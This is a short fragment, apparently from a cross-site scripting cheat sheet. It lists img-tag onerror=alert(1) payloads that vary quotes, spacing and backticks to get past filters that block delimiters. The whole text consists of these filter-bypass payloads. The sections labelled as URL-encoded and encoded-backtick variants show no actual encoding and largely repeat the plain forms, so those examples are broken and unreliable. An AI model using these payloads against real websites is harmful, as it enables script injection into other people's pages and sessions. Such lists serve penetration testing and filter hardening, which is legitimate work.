Delimiters and brackers
| Column | Sometimes we can play with things like delimiters by encoding them if they are blocked |
|---|---|
| Tags | <img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
URL encodign
<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
Backticks
<img onerror=alert(1)src=x>
Encoded backtics
<img onerror=`alert(1)`src=x> |